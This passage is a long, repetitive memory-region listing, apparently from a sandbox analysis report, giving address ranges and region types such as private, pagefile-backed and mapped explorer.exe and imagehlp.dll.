private name = "private_0x0000000005e50000" filename = "" Region: id = 1286 start_va = 0x9c80000 end_va = 0x9ef3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1287 start_va = 0x5e50000 end_va = 0x60c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1288 start_va = 0x9c80000 end_va = 0x9ef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1289 start_va = 0x5e50000 end_va = 0x60cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1290 start_va = 0x9c80000 end_va = 0x9efdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1291 start_va = 0x5e50000 end_va = 0x60d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1292 start_va = 0x9c80000 end_va = 0x9f02fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1293 start_va = 0x5e50000 end_va = 0x60d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1294 start_va = 0x9c80000 end_va = 0x9f07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1295 start_va = 0x5e50000 end_va = 0x60dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1296 start_va = 0x9c80000 end_va = 0x9f0cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1297 start_va = 0x5e50000 end_va = 0x60dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1298 start_va = 0x9c80000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1299 start_va = 0x2430000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1300 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1301 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1302 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1303 start_va = 0x5e50000 end_va = 0x60e4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1320 start_va = 0x9c80000 end_va = 0x9f16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1333 start_va = 0x5e50000 end_va = 0x60e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1341 start_va = 0x9c80000 end_va = 0x9f1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1342 start_va = 0x5e50000 end_va = 0x60eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1354 start_va = 0x9c80000 end_va = 0x9f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1363 start_va = 0x5e50000 end_va = 0x60f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1371 start_va = 0x9c80000 end_va = 0x9f25fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1372 start_va = 0x5e50000 end_va = 0x60f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1373 start_va = 0x9c80000 end_va = 0x9f2afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1381 start_va = 0x5e50000 end_va = 0x60fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1714 start_va = 0x9c80000 end_va = 0x9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1715 start_va = 0x5e50000 end_va = 0x6102fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1716 start_va = 0x9c80000 end_va = 0x9f34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1717 start_va = 0x5e50000 end_va = 0x6107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1718 start_va = 0x9c80000 end_va = 0x9f39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1719 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1720 start_va = 0x5e50000 end_va = 0x610cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1721 start_va = 0x9c80000 end_va = 0x9f3efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1722 start_va = 0x5e50000 end_va = 0x6111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1723 start_va = 0x9c80000 end_va = 0x9f43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1724 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1725 start_va = 0x5e50000 end_va = 0x6116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1726 start_va = 0x9c80000 end_va = 0x9f48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1727 start_va = 0x5e50000 end_va = 0x611bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1728 start_va = 0x9c80000 end_va = 0x9f4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1729 start_va = 0x5e50000 end_va = 0x6120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1730 start_va = 0x9c80000 end_va = 0x9f52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1731 start_va = 0x5e50000 end_va = 0x6125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1732 start_va = 0x9c80000 end_va = 0x9f57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1733 start_va = 0x5e50000 end_va = 0x612afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1734 start_va = 0x9c80000 end_va = 0x9f5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1735 start_va = 0x5e50000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1736 start_va = 0x9c80000 end_va = 0x9f61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1737 start_va = 0x5e50000 end_va = 0x6134fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1738 start_va = 0x9c80000 end_va = 0x9f66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1739 start_va = 0x5e50000 end_va = 0x6139fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1740 start_va = 0x9c80000 end_va = 0x9f6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1741 start_va = 0x5e50000 end_va = 0x613efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1742 start_va = 0x9c80000 end_va = 0x9f70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1743 start_va = 0x5e50000 end_va = 0x6143fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1744 start_va = 0x9c80000 end_va = 0x9f75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1745 start_va = 0x5e50000 end_va = 0x6148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1746 start_va = 0x9c80000 end_va = 0x9f7afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1747 start_va = 0x5e50000 end_va = 0x614dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1748 start_va = 0x9c80000 end_va = 0x9f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1749 start_va = 0x5e50000 end_va = 0x6152fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1750 start_va = 0x9c80000 end_va = 0x9f84fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1751 start_va = 0x5e50000 end_va = 0x6157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1752 start_va = 0x9c80000 end_va = 0x9f89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1753 start_va = 0x5e50000 end_va = 0x615cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1754 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1755 start_va = 0x9c80000 end_va = 0x9f8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1756 start_va = 0x5e50000 end_va = 0x6161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1757 start_va = 0x9c80000 end_va = 0x9f93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1758 start_va = 0x5e50000 end_va = 0x6166fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1759 start_va = 0x9c80000 end_va = 0x9f98fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1760 start_va = 0x5e50000 end_va = 0x616bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1761 start_va = 0x9c80000 end_va = 0x9f9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1762 start_va = 0x5e50000 end_va = 0x6170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1763 start_va = 0x9c80000 end_va = 0x9fa2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1764 start_va = 0x5e50000 end_va = 0x6175fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1765 start_va = 0x9c80000 end_va = 0x9fa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1766 start_va = 0x5e50000 end_va = 0x617afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1767 start_va = 0x9c80000 end_va = 0x9facfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1768 start_va = 0x5e50000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1769 start_va = 0x9c80000 end_va = 0x9fb1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1770 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1771 start_va = 0x5e50000 end_va = 0x6184fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1772 start_va = 0x9c80000 end_va = 0x9fb6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1773 start_va = 0x5e50000 end_va = 0x6189fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1774 start_va = 0x9c80000 end_va = 0x9fbbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1791 start_va = 0x5e50000 end_va = 0x618efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1792 start_va = 0x9c80000 end_va = 0x9fc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1793 start_va = 0x5e50000 end_va = 0x6193fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1794 start_va = 0x9c80000 end_va = 0x9fc5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1795 start_va = 0x5e50000 end_va = 0x6198fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1796 start_va = 0x9c80000 end_va = 0x9fcafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1797 start_va = 0x5e50000 end_va = 0x619dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1798 start_va = 0x9c80000 end_va = 0x9fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1799 start_va = 0x5e50000 end_va = 0x61a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1801 start_va = 0x9c80000 end_va = 0x9fd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1808 start_va = 0x5e50000 end_va = 0x61a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1809 start_va = 0x9c80000 end_va = 0x9fd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1810 start_va = 0x5e50000 end_va = 0x61acfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1811 start_va = 0x9c80000 end_va = 0x9fdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1812 start_va = 0x5e50000 end_va = 0x61b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1813 start_va = 0x9c80000 end_va = 0x9fe3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1814 start_va = 0x5e50000 end_va = 0x61b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1815 start_va = 0x9c80000 end_va = 0x9fe8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1816 start_va = 0x5e50000 end_va = 0x61bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1817 start_va = 0x9c80000 end_va = 0x9fedfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1818 start_va = 0x5e50000 end_va = 0x61c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1819 start_va = 0x9c80000 end_va = 0x9ff2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1820 start_va = 0x5e50000 end_va = 0x61c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1821 start_va = 0x9c80000 end_va = 0x9ff7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1822 start_va = 0x5e50000 end_va = 0x61cafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1823 start_va = 0x9c80000 end_va = 0x9ffcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 1824 start_va = 0x5e50000 end_va = 0x61c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 1877 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1889 start_va = 0x2430000 end_va = 0x2430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2424 start_va = 0x9c80000 end_va = 0x9f3dfff monitored = 0 entry_point = 0x9cab790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2425 start_va = 0x46d0000 end_va = 0x474ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 2426 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 2427 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2428 start_va = 0x2580000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2429 start_va = 0x9c80000 end_va = 0x9f3dfff monitored = 0 entry_point = 0x9cab790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 2456 start_va = 0x2430000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2457 start_va = 0x2610000 end_va = 0x2621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2458 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 2459 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 2686 start_va = 0x2430000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2687 start_va = 0x2580000 end_va = 0x2580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 2688 start_va = 0x2590000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 2689 start_va = 0x2610000 end_va = 0x2621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2690 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 2691 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 2734 start_va = 0x2430000 end_va = 0x243dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 2892 start_va = 0x2430000 end_va = 0x2432fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2893 start_va = 0x2610000 end_va = 0x2618fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2894 start_va = 0x2620000 end_va = 0x2628fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 2895 start_va = 0x2630000 end_va = 0x2631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 2896 start_va = 0x2640000 end_va = 0x2640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 2897 start_va = 0x2650000 end_va = 0x2650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 2898 start_va = 0x2660000 end_va = 0x2759fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 2900 start_va = 0x2660000 end_va = 0x2660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2904 start_va = 0x7c40000 end_va = 0x803ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c40000" filename = "" Region: id = 2905 start_va = 0x2670000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2906 start_va = 0x2770000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002770000" filename = "" Region: id = 2907 start_va = 0x6670000 end_va = 0x6771fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2908 start_va = 0x2670000 end_va = 0x2774fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2909 start_va = 0x6670000 end_va = 0x6776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2910 start_va = 0x2670000 end_va = 0x2779fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2914 start_va = 0x46a0000 end_va = 0x47abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2915 start_va = 0x2670000 end_va = 0x277efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2916 start_va = 0x46a0000 end_va = 0x47b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2917 start_va = 0x6670000 end_va = 0x6783fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2918 start_va = 0x46a0000 end_va = 0x47b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2919 start_va = 0x6670000 end_va = 0x6788fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2920 start_va = 0x46a0000 end_va = 0x47bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2921 start_va = 0x6670000 end_va = 0x678dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2922 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 2923 start_va = 0x46a0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2924 start_va = 0x6670000 end_va = 0x6792fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2925 start_va = 0x46a0000 end_va = 0x47c4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2926 start_va = 0x6670000 end_va = 0x6797fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2927 start_va = 0x46a0000 end_va = 0x47c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2928 start_va = 0x6670000 end_va = 0x679cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2929 start_va = 0x46a0000 end_va = 0x47cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2930 start_va = 0x6670000 end_va = 0x67a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2931 start_va = 0x6db0000 end_va = 0x6ee3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2932 start_va = 0x6670000 end_va = 0x67a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2933 start_va = 0x6db0000 end_va = 0x6ee8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2934 start_va = 0x6670000 end_va = 0x67abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2935 start_va = 0x6db0000 end_va = 0x6eedfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2936 start_va = 0x6670000 end_va = 0x67b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2937 start_va = 0x6db0000 end_va = 0x6ef2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2938 start_va = 0x6670000 end_va = 0x67b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2939 start_va = 0x6db0000 end_va = 0x6ef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2940 start_va = 0x6670000 end_va = 0x67bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2941 start_va = 0x2670000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2942 start_va = 0x2670000 end_va = 0x2681fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 2943 start_va = 0x2690000 end_va = 0x269dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 2944 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 2945 start_va = 0x6db0000 end_va = 0x6efcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2946 start_va = 0x6670000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2947 start_va = 0x6db0000 end_va = 0x6f01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2948 start_va = 0x6670000 end_va = 0x67c4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2949 start_va = 0x6db0000 end_va = 0x6f06fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2950 start_va = 0x6670000 end_va = 0x67c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2951 start_va = 0x6db0000 end_va = 0x6f0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2952 start_va = 0x6670000 end_va = 0x67cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2953 start_va = 0x6db0000 end_va = 0x6f10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2954 start_va = 0x6670000 end_va = 0x67d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2955 start_va = 0x6db0000 end_va = 0x6f15fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2956 start_va = 0x6670000 end_va = 0x67d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2957 start_va = 0x6db0000 end_va = 0x6f1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2958 start_va = 0x6670000 end_va = 0x67ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2959 start_va = 0x6db0000 end_va = 0x6f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2962 start_va = 0x6670000 end_va = 0x67e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2964 start_va = 0x6db0000 end_va = 0x6f24fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2966 start_va = 